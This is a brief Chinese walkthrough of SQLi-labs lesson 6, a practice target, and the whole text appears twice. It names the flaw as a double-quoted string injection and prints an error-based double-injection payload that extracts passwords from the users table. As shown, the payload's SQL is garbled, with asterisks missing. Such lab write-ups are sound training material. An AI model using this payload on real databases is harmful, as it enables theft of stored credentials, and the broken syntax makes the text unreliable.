Sqli labs less6
1.本题的主要考点是:字符型、双引号、报错注入、双注入
本题解题思路参考上一题,输入?id=1',无报错
输入?id=1" 此时出现报错信息
和less5原理相同, union select count(),1,concat((floor(rand(0)2)),';',(select password from users limit 1,1))name from mysql.user group by name; %23
可以爆出数据库的信息
1.本题的主要考点是:字符型、双引号、报错注入、双注入
本题解题思路参考上一题,输入?id=1',无报错
输入?id=1" 此时出现报错信息
和less5原理相同, union select count(),1,concat((floor(rand(0)2)),';',(select password from users limit 1,1))name from mysql.user group by name; %23
可以爆出数据库的信息
浙公网安备 33010602011771号